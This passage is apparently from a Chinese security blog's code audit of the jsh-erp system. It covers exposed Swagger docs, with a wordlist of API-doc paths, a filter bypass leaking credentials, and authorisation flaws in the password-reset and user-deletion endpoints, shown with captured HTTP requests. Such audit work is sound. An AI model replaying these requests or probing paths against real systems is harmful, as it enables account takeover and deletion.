<div class=highlight><pre><span></span>/api
/api-docs
/api-docs/swagger.json
/api.html
/api/api-docs
/api/apidocs
/api/doc
/api/swagger
/api/swagger-ui
/api/swagger-ui.html
/api/swagger-ui.html/
/api/swagger-ui.json
/api/swagger.json
/api/swagger/
/api/swagger/ui
/api/swagger/ui/
/api/swaggerui
/api/swaggerui/
/api/v1/
/api/v1/api-docs
/api/v1/apidocs
/api/v1/swagger
/api/v1/swagger-ui
/api/v1/swagger-ui.html
/api/v1/swagger-ui.json
/api/v1/swagger.json
/api/v1/swagger/
/api/v2
/api/v2/api-docs
/api/v2/apidocs
/api/v2/swagger
/api/v2/swagger-ui
/api/v2/swagger-ui.html
/api/v2/swagger-ui.json
/api/v2/swagger.json
/api/v2/swagger/
/api/v3
/apidocs
/apidocs/swagger.json
/doc.html
/docs/
/druid/index.html
/graphql
/libs/swaggerui
/libs/swaggerui/
/spring-security-oauth-resource/swagger-ui.html
/spring-security-rest/api/swagger-ui.html
/sw/swagger-ui.html
/swagger
/swagger-resources
/swagger-resources/configuration/security
/swagger-resources/configuration/security/
/swagger-resources/configuration/ui
/swagger-resources/configuration/ui/
/swagger-ui
/swagger-ui.html
/swagger-ui.html#/api-memory-controller
/swagger-ui.html/
/swagger-ui.json
/swagger-ui/swagger.json
/swagger.json
/swagger.yml
/swagger/
/swagger/index.html
/swagger/static/index.html
/swagger/swagger-ui.html
/swagger/ui/
/Swagger/ui/index
/swagger/ui/index
/swagger/v1/swagger.json
/swagger/v2/swagger.json
/template/swagger-ui.html
/user/swagger-ui.html
/user/swagger-ui.html/
/v1.x/swagger-ui.html
/v1/api-docs
/v1/swagger.json
/v2/api-docs
/v3/api-docs
</pre></div>
<h4>分析</h4>
<p>swagger配置类Swagger2Config.java</p>
<div class=highlight><pre><span></span><span class=nd>@Configuration</span>
<span class=nd>@EnableSwagger2</span>
<span class=kd>public</span> <span class=kd>class</span> <span class=nc>Swagger2Config</span> <span class=o>{</span>
<span class=nd>@Bean</span>
<span class=kd>public</span> <span class=n>Docket</span> <span class=nf>createRestApi</span><span class=o>()</span> <span class=o>{</span>
<span class=k>return</span> <span class=k>new</span> <span class=n>Docket</span><span class=o>(</span><span class=n>DocumentationType</span><span class=o>.</span><span class=na>SWAGGER_2</span><span class=o>)</span>
<span class=o>.</span><span class=na>apiInfo</span><span class=o>(</span><span class=k>this</span><span class=o>.</span><span class=na>apiInfo</span><span class=o>())</span>
<span class=o>.</span><span class=na>select</span><span class=o>()</span>
<span class=o>.</span><span class=na>apis</span><span class=o>(</span><span class=n>RequestHandlerSelectors</span><span class=o>.</span><span class=na>any</span><span class=o>())</span>
<span class=o>.</span><span class=na>paths</span><span class=o>(</span><span class=n>PathSelectors</span><span class=o>.</span><span class=na>any</span><span class=o>())</span>
<span class=o>.</span><span class=na>build</span><span class=o>();</span>
<span class=o>}</span>
<span class=kd>private</span> <span class=n>ApiInfo</span> <span class=nf>apiInfo</span><span class=o>()</span> <span class=o>{</span>
<span class=k>return</span> <span class=k>new</span> <span class=n>ApiInfoBuilder</span><span class=o>()</span>
<span class=o>.</span><span class=na>title</span><span class=o>(</span><span class=s>"Mybatis-Plus Plugin Example RESTful APIs"</span><span class=o>)</span>
<span class=o>.</span><span class=na>description</span><span class=o>(</span><span class=s>"集成Mybatis-Plus模块接口描述"</span><span class=o>)</span>
<span class=o>.</span><span class=na>termsOfServiceUrl</span><span class=o>(</span><span class=s>"http://127.0.0.1"</span><span class=o>)</span>
<span class=o>.</span><span class=na>contact</span><span class=o>(</span><span class=k>new</span> <span class=n>Contact</span><span class=o>(</span><span class=s>"jishenghua"</span><span class=o>,</span> <span class=s>""</span><span class=o>,</span> <span class=s>""</span><span class=o>))</span>
<span class=o>.</span><span class=na>version</span><span class=o>(</span><span class=s>"2.1.1"</span><span class=o>)</span>
<span class=o>.</span><span class=na>build</span><span class=o>();</span>
<span class=o>}</span>
<span class=o>}</span>
</pre></div>
<p>在该类及配置文件中未进行任何的限制及访问控制和身份验证另外在filter中也未进行身份判断因此导致在未登录的情况下能够请求得到api接口</p>
<h4>测试</h4>
<p><a id=img25 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233536-8baf5894-c117-1.png><img src="
<h4>修复</h4>
<ol>
<li>限制生成文档的请求处理程序:使用适当的 <code>RequestHandlerSelectors</code> 来选择只包含需要公开的接口,而不是使用 <code>RequestHandlerSelectors.any()</code></li>
<li>限制生成文档的路径:使用适当的 <code>PathSelectors</code> 来选择只包含需要公开的路径,而不是使用 <code>PathSelectors.any()</code></li>
<li>添加访问控制和身份验证:确保只有授权用户能够访问 Swagger API 文档。这可以通过配置身份验证和授权机制来实现,例如基于角色或令牌的访问控制。</li>
<li>定期审查和更新配置:定期审查 Swagger API 文档的配置,确保其与应用程序的安全需求保持一致,并经常更新以反映最新的安全要求。</li>
</ol>
<h3 id=toc-17>账号密码泄露</h3>
<h4>分析</h4>
<p>在LogCostFilter.java中进行了简单分析有3个条件只需要满足其中一个即可不需要登录就能够访问</p>
<ul>
<li>请求url中包含/doc.html、/register.html、/login.html</li>
<li>请求url中包含[.css.js.jpg.png.gif.ico]中任意一个元素即可</li>
<li>请求url以/user/login、/user/registerUser、/v2/api-docs开头即可</li>
</ul>
<p>因此选择上面的任意一个条件利用即可</p>
<h4>测试</h4>
<p><a id=img26 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233549-9358666c-c117-1.png><img src="
<h2 id=toc-18>越权漏洞</h2>
<h3 id=toc-19>重置密码</h3>
<h4>分析</h4>
<p>根据路径找到对应的路由</p>
<div class=highlight><pre><span></span><span class=nd>@PostMapping</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=s>"/resetPwd"</span><span class=o>)</span>
<span class=kd>public</span> <span class=n>String</span> <span class=nf>resetPwd</span><span class=o>(</span><span class=nd>@RequestParam</span><span class=o>(</span><span class=s>"id"</span><span class=o>)</span> <span class=n>Long</span> <span class=n>id</span><span class=o>,</span>
<span class=n>HttpServletRequest</span> <span class=n>request</span><span class=o>)</span> <span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>&gt;</span> <span class=n>objectMap</span> <span class=o>=</span> <span class=k>new</span> <span class=n>HashMap</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>&gt;();</span>
<span class=c1>// 初始密码</span>
<span class=n>String</span> <span class=n>password</span> <span class=o>=</span> <span class=s>"123456"</span><span class=o>;</span>
<span class=n>String</span> <span class=n>md5Pwd</span> <span class=o>=</span> <span class=n>Tools</span><span class=o>.</span><span class=na>md5Encryp</span><span class=o>(</span><span class=n>password</span><span class=o>);</span>
<span class=c1>// 重置操作</span>
<span class=kt>int</span> <span class=n>update</span> <span class=o>=</span> <span class=n>userService</span><span class=o>.</span><span class=na>resetPwd</span><span class=o>(</span><span class=n>md5Pwd</span><span class=o>,</span> <span class=n>id</span><span class=o>);</span>
<span class=k>if</span><span class=o>(</span><span class=n>update</span> <span class=o>&gt;</span> <span class=mi>0</span><span class=o>)</span> <span class=o>{</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=n>message</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span> <span class=k>else</span> <span class=o>{</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=n>message</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>ERROR</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span>
<span class=o>}</span>
</pre></div>
<p>对应userService的resetPwd方法</p>
<div class=highlight><pre><span></span><span class=nd>@Transactional</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=s>"transactionManager"</span><span class=o>,</span> <span class=n>rollbackFor</span> <span class=o>=</span> <span class=n>Exception</span><span class=o>.</span><span class=na>class</span><span class=o>)</span>
<span class=kd>public</span> <span class=kt>int</span> <span class=nf>resetPwd</span><span class=o>(</span><span class=n>String</span> <span class=n>md5Pwd</span><span class=o>,</span> <span class=n>Long</span> <span class=n>id</span><span class=o>)</span> <span class=kd>throws</span> <span class=n>Exception</span><span class=o>{</span>
<span class=kt>int</span> <span class=n>result</span><span class=o>=</span><span class=mi>0</span><span class=o>;</span>
<span class=n>logService</span><span class=o>.</span><span class=na>insertLog</span><span class=o>(</span><span class=s>"用户"</span><span class=o>,</span>
<span class=k>new</span> <span class=n>StringBuffer</span><span class=o>(</span><span class=n>BusinessConstants</span><span class=o>.</span><span class=na>LOG_OPERATION_TYPE_EDIT</span><span class=o>).</span><span class=na>append</span><span class=o>(</span><span class=n>id</span><span class=o>).</span><span class=na>toString</span><span class=o>(),</span>
<span class=o>((</span><span class=n>ServletRequestAttributes</span><span class=o>)</span> <span class=n>RequestContextHolder</span><span class=o>.</span><span class=na>getRequestAttributes</span><span class=o>()).</span><span class=na>getRequest</span><span class=o>());</span>
<span class=c1>// 根据id获取用户</span>
<span class=n>User</span> <span class=n>u</span> <span class=o>=</span> <span class=n>getUser</span><span class=o>(</span><span class=n>id</span><span class=o>);</span>
<span class=n>String</span> <span class=n>loginName</span> <span class=o>=</span> <span class=n>u</span><span class=o>.</span><span class=na>getLoginName</span><span class=o>();</span>
<span class=c1>// 判断需要重置的是否是admin用户</span>
<span class=k>if</span><span class=o>(</span><span class=s>"admin"</span><span class=o>.</span><span class=na>equals</span><span class=o>(</span><span class=n>loginName</span><span class=o>)){</span>
<span class=n>logger</span><span class=o>.</span><span class=na>info</span><span class=o>(</span><span class=s>"禁止重置超管密码"</span><span class=o>);</span>
<span class=o>}</span> <span class=k>else</span> <span class=o>{</span>
<span class=n>User</span> <span class=n>user</span> <span class=o>=</span> <span class=k>new</span> <span class=n>User</span><span class=o>();</span>
<span class=n>user</span><span class=o>.</span><span class=na>setId</span><span class=o>(</span><span class=n>id</span><span class=o>);</span>
<span class=n>user</span><span class=o>.</span><span class=na>setPassword</span><span class=o>(</span><span class=n>md5Pwd</span><span class=o>);</span>
<span class=k>try</span><span class=o>{</span>
<span class=c1>// 重置操作</span>
<span class=n>result</span><span class=o>=</span><span class=n>userMapper</span><span class=o>.</span><span class=na>updateByPrimaryKeySelective</span><span class=o>(</span><span class=n>user</span><span class=o>);</span>
<span class=o>}</span><span class=k>catch</span><span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>){</span>
<span class=n>JshException</span><span class=o>.</span><span class=na>writeFail</span><span class=o>(</span><span class=n>logger</span><span class=o>,</span> <span class=n>e</span><span class=o>);</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=k>return</span> <span class=n>result</span><span class=o>;</span>
<span class=o>}</span>
</pre></div>
<p>这里没有将当前登陆的用户与需要修改的用户进行比对找到对应的修改SQL语句</p>
<div class=highlight><pre><span></span><span class=nt>&lt;update</span> <span class=na>id=</span><span class=s>"updateByPrimaryKeySelective"</span> <span class=na>parameterType=</span><span class=s>"com.jsh.erp.datasource.entities.User"</span><span class=nt>&gt;</span>
update jsh_user
<span class=nt>&lt;set&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"username != null"</span><span class=nt>&gt;</span>
username = #{username,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"loginName != null"</span><span class=nt>&gt;</span>
login_name = #{loginName,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"password != null"</span><span class=nt>&gt;</span>
password = #{password,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"position != null"</span><span class=nt>&gt;</span>
position = #{position,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"department != null"</span><span class=nt>&gt;</span>
department = #{department,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"email != null"</span><span class=nt>&gt;</span>
email = #{email,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"phonenum != null"</span><span class=nt>&gt;</span>
phonenum = #{phonenum,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"ismanager != null"</span><span class=nt>&gt;</span>
ismanager = #{ismanager,jdbcType=TINYINT},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"isystem != null"</span><span class=nt>&gt;</span>
isystem = #{isystem,jdbcType=TINYINT},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"status != null"</span><span class=nt>&gt;</span>
Status = #{status,jdbcType=TINYINT},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"description != null"</span><span class=nt>&gt;</span>
description = #{description,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"remark != null"</span><span class=nt>&gt;</span>
remark = #{remark,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"tenantId != null"</span><span class=nt>&gt;</span>
tenant_id = #{tenantId,jdbcType=BIGINT},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;/set&gt;</span>
where id = #{id,jdbcType=BIGINT}
<span class=nt>&lt;/update&gt;</span>
</pre></div>
<p>where条件中只根据id查询</p>
<h4>测试</h4>
<p>用户原始密码</p>
<p><a id=img27 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233607-9e122b88-c117-1.png><img src="
<p>现在登陆jsh用户尝试重置test123用户密码</p>
<p><a id=img28 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233617-a43350f0-c117-1.png><img src=
<p>抓包</p>
<pre><code>POST /user/resetPwd HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/pages/manage/user.html
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1706618997,1706707611,1706717491; JSESSIONID=30DAE0DC23EE5303A1CFE03DD4394A2F; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1706781674
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
id=63</code></pre>
<p>这里只传递了userId尝试对userId进行修改再发送请求</p>
<p><a id=img29 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233631-ac745188-c117-1.png><img src="
<p>请求成功,查看数据库中数据</p>
<p><a id=img30 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233644-b458cd20-c117-1.png><img src=
<p>成功将test123用户的密码进行重置sql语句如下</p>
<div class=highlight><pre><span></span><span class=k>UPDATE</span> <span class=n>jsh_user</span> <span class=k>SET</span> <span class=n>password</span> <span class=o>=</span> <span class=s1>'e10adc3949ba59abbe56e057f20f883e'</span> <span class=k>WHERE</span> <span class=n>jsh_user</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=n>id</span> <span class=o>=</span> <span class=mi>131</span>
</pre></div>
<p>根据前面的代码逻辑admin账号无法重置其他账号权限低无法重置权限高的账户此漏洞可与前面密码泄露结合利用</p>
<h3 id=toc-20>删除用户</h3>
<h4>分析</h4>
<p>找到对应的controller</p>
<div class=highlight><pre><span></span><span class=nd>@PostMapping</span><span class=o>(</span><span class=s>"/deleteUser"</span><span class=o>)</span>
<span class=nd>@ResponseBody</span>
<span class=kd>public</span> <span class=n>Object</span> <span class=nf>deleteUser</span><span class=o>(</span><span class=nd>@RequestParam</span><span class=o>(</span><span class=s>"ids"</span><span class=o>)</span> <span class=n>String</span> <span class=n>ids</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span><span class=o>{</span>
<span class=n>JSONObject</span> <span class=n>result</span> <span class=o>=</span> <span class=n>ExceptionConstants</span><span class=o>.</span><span class=na>standardSuccess</span><span class=o>();</span>
<span class=c1>// 这里</span>
<span class=n>userService</span><span class=o>.</span><span class=na>batDeleteUser</span><span class=o>(</span><span class=n>ids</span><span class=o>);</span>
<span class=k>return</span> <span class=n>result</span><span class=o>;</span>
<span class=o>}</span>
</pre></div>
<p>进入service层</p>
<div class=highlight><pre><span></span><span class=nd>@Transactional</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=s>"transactionManager"</span><span class=o>,</span> <span class=n>rollbackFor</span> <span class=o>=</span> <span class=n>Exception</span><span class=o>.</span><span class=na>class</span><span class=o>)</span>
<span class=kd>public</span> <span class=kt>void</span> <span class=nf>batDeleteUser</span><span class=o>(</span><span class=n>String</span> <span class=n>ids</span><span class=o>)</span> <span class=kd>throws</span> <span class=n>Exception</span><span class=o>{</span>
<span class=n>StringBuffer</span> <span class=n>sb</span> <span class=o>=</span> <span class=k>new</span> <span class=n>StringBuffer</span><span class=o>();</span>
<span class=n>sb</span><span class=o>.</span><span class=na>append</span><span class=o>(</span><span class=n>BusinessConstants</span><span class=o>.</span><span class=na>LOG_OPERATION_TYPE_DELETE</span><span class=o>);</span>
<span class=n>List</span><span class=o>&lt;</span><span class=n>User</span><span class=o>&gt;</span> <span class=n>list</span> <span class=o>=</span> <span class=n>getUserListByIds</span><span class=o>(</span><span class=n>ids</span><span class=o>);</span>
<span class=k>for</span><span class=o>(</span><span class=n>User</span> <span class=n>user</span><span class=o>:</span> <span class=n>list</span><span class=o>){</span>
<span class=n>sb</span><span class=o>.</span><span class=na>append</span><span class=o>(</span><span class=s>"["</span><span class=o>).</span><span class=na>append</span><span class=o>(</span><span class=n>user</span><span class=o>.</span><span class=na>getLoginName</span><span class=o>()).</span><span class=na>append</span><span class=o>(</span><span class=s>"]"</span><span class=o>);</span>
<span class=o>}</span>
<span class=n>logService</span><span class=o>.</span><span class=na>insertLog</span><span class=o>(</span><span class=s>"用户"</span><span class=o>,</span> <span class=n>sb</span><span class=o>.</span><span class=na>toString</span><span class=o>(),</span>
<span class=o>((</span><span class=n>ServletRequestAttributes</span><span class=o>)</span> <span class=n>RequestContextHolder</span><span class=o>.</span><span class=na>getRequestAttributes</span><span class=o>()).</span><span class=na>getRequest</span><span class=o>());</span>
<span class=n>String</span> <span class=n>idsArray</span><span class=o>[]=</span><span class=n>ids</span><span class=o>.</span><span class=na>split</span><span class=o>(</span><span class=s>","</span><span class=o>);</span>
<span class=kt>int</span> <span class=n>result</span> <span class=o>=</span><span class=mi>0</span><span class=o>;</span>
<span class=k>try</span><span class=o>{</span>
<span class=c1>// 这里</span>
<span class=n>result</span><span class=o>=</span><span class=n>userMapperEx</span><span class=o>.</span><span class=na>batDeleteOrUpdateUser</span><span class=o>(</span><span class=n>idsArray</span><span class=o>,</span><span class=n>BusinessConstants</span><span class=o>.</span><span class=na>USER_STATUS_DELETE</span><span class=o>);</span>
<span class=o>}</span><span class=k>catch</span><span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>){</span>
<span class=n>JshException</span><span class=o>.</span><span class=na>writeFail</span><span class=o>(</span><span class=n>logger</span><span class=o>,</span> <span class=n>e</span><span class=o>);</span>
<span class=o>}</span>
<span class=k>if</span><span class=o>(</span><span class=n>result</span><span class=o>&lt;</span><span class=mi>1</span><span class=o>){</span>
<span class=n>logger</span><span class=o>.</span><span class=na>error</span><span class=o>(</span><span class=s>"异常码[{}],异常提示[{}],参数,ids:[{}]"</span><span class=o>,</span>
<span class=n>ExceptionConstants</span><span class=o>.</span><span class=na>USER_DELETE_FAILED_CODE</span><span class=o>,</span><span class=n>ExceptionConstants</span><span class=o>.</span><span class=na>USER_DELETE_FAILED_MSG</span><span class=o>,</span><span class=n>ids</span><span class=o>);</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>BusinessRunTimeException</span><span class=o>(</span><span class=n>ExceptionConstants</span><span class=o>.</span><span class=na>USER_DELETE_FAILED_CODE</span><span class=o>,</span>
<span class=n>ExceptionConstants</span><span class=o>.</span><span class=na>USER_DELETE_FAILED_MSG</span><span class=o>);</span>
<span class=o>}</span>
<span class=o>}</span>
</pre></div>
<p>完全没有根据当前用户的权限来决定是否有资格删除相关用户</p>
<p>sql查询语句</p>
<div class=highlight><pre><span></span><span class=nt>&lt;update</span> <span class=na>id=</span><span class=s>"batDeleteOrUpdateUser"</span><span class=nt>&gt;</span>
update jsh_user
set status=#{status}
where id in (
<span class=nt>&lt;foreach</span> <span class=na>collection=</span><span class=s>"ids"</span> <span class=na>item=</span><span class=s>"id"</span> <span class=na>separator=</span><span class=s>","</span><span class=nt>&gt;</span>
#{id}
<span class=nt>&lt;/foreach&gt;</span>
)
<span class=nt>&lt;/update&gt;</span>
</pre></div>
<h4>测试</h4>
<p>数据库原始数据</p>
<p><a id=img31 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233700-bde49176-c117-1.png><img src=
<p>登陆jsh账户选择一个用户进行删除</p>
<p><a id=img32 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233711-c3e8c4c0-c117-1.png><img src="
<p>抓包</p>
<pre><code>POST /user/deleteUser HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 7
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/pages/manage/user.html
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1706618997,1706707611,1706717491; JSESSIONID=67A20DB5D3DCEF7277316B22B9D579C3; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1706790058
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
ids=135</code></pre>
<p>利用前面的未授权漏洞修改请求删除132账户</p>
<p><a id=img33 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233723-cb6f4174-c117-1.png><img src="
<p>删除成功,此时数据库中的数据</p>
<p><a id=img34 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233734-d1b5edf8-c117-1.png><img src="
<p>相关的sql语句</p>
<div class=highlight><pre><span></span><span class=k>UPDATE</span> <span class=n>jsh_user</span> <span class=k>SET</span> <span class=n>status</span> <span class=o>=</span> <span class=mi>1</span> <span class=k>WHERE</span> <span class=n>id</span> <span class=k>IN</span> <span class=p>(</span><span class=s1>'132'</span><span class=p>)</span>
</pre></div>
<p>另外在不使用未授权漏洞进行删除时sql语句中存在对tenant_id字段的判断如下sql语句</p>
<div class=highlight><pre><span></span><span class=k>UPDATE</span> <span class=n>jsh_user</span> <span class=k>SET</span> <span class=n>status</span> <span class=o>=</span> <span class=mi>1</span> <span class=k>WHERE</span> <span class=n>jsh_user</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=n>id</span> <span class=k>IN</span> <span class=p>(</span><span class=s1>'132'</span><span class=p>)</span>
</pre></div>
<h2 id=toc-21>总结</h2>
<p>后续通过学习codeql来提高审计效率漏洞寻找过程并不困难写出来需要花费时间文章写的匆忙代码中关键处含有注释若有错误请批评指正</p>
</div>
<div class=post-user-action style=margin-top:34px>
<span class="btn btn-default pull-right" id=mark data-action=topic data-pk=13525>
<span id=mark-text>点击收藏 </span><span class=i-seprator> | </span><span id=mark-count>5</span>
</span>
<span class="btn btn-default pull-right" id=follow_topic data-pk=13525>
<span>关注</span><span class=i-seprator> | </span><span id=follow-count>1</span>
</span>
<span class="btn btn-default pull-right">
<span>
<span id=ready_reward data-toggle=modal data-target=#myModal>打赏</span>
</span>
</span>
<div class=clearfix></div>
</div>
<div class=related-section>
<div class=related-box>
<span><a class=pull-left href=https://xz.aliyun.com/t/13524 title="Nosql inject-InfluxDB"><span class=related-label style="padding:3px 4px;margin-right:3px">上一篇:</span>Nosql inject-Infl...</a></span>
<span><a class=pull-left href=https://xz.aliyun.com/t/13526 title=Weiphp3.0&amp;&amp;5.0前台rce&amp;&amp;sql注入分析><span class=related-label>下一篇:</span>Weiphp3.0&amp;&amp;5.0前台r...</a></span>
</div>
</div>
</div>
</div>
</div>
<div class="modal fade" id=myModal role=dialog aria-labelledby=myModalLabel aria-hidden=true>
<div class=modal-dialog>
<div class=modal-content>
<div class=modal-header>
<h4 class=modal-title id=myModalLabel style=text-align:center>
积分打赏
</h4>
</div>
<div class=modal-body id=button-value>
<div style=text-align:center>
<div role=group>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type1>
1分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type2>
2分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type3>
5分
</button>
</div>
<br>
<div style=margin-top:20px>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type4>
8分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type5>
10分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type6>
20分
</button>
</div>
</div>
</div>
<div class=modal-footer id=confirm>
<button type=button class="btn btn-default" data-dismiss=modal>关闭</button>
<button type=button class="btn btn-primary" id=reward_topic data-pk=13525>确定</button>
</div>
</div>
</div>
</div>
<div class="row box">
<ol class=breadcrumb>
<li class=active>0 条回复</li>
</ol>
<div class="box-container post-container">
<ul>
<li style=min-height:50px;line-height:60px;margin-left:15px><strong>动动手指,沙发就是你的了!</strong></li>
</ul>
</div>
</div>
<div class="row box" id=reply-box>
<div class="box-container clearfix">
<div class=reminder>
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F13525&amp;from_type=xianzhi"><strong>登录</strong></a> 后跟帖
</div>
</div>
</div>
</div>
</div>
</div>
<footer class=bs-docs-footer>
<div class="container text-center">
<div class=links>
<a href=https://xz.aliyun.com/feed target=_blank>RSS</a>
<a href=https://xz.aliyun.com/about target=_blank><span>关于社区</span></a>
<a href=https://xz.aliyun.com/partner target=_blank><span>友情链接</span></a>
<a href=https://xz.aliyun.com/notice>社区小黑板</a>
<a href=https://xz.aliyun.com/connection>联系我们</a>
<a href=https://report.aliyun.com/ target=_blank>举报中心</a>
<a href=https://www.aliyun.com/complaint target=_blank>我要投诉</a>
</div>
</div>
</footer>
<div id=waf_nc_block style=display:none></div>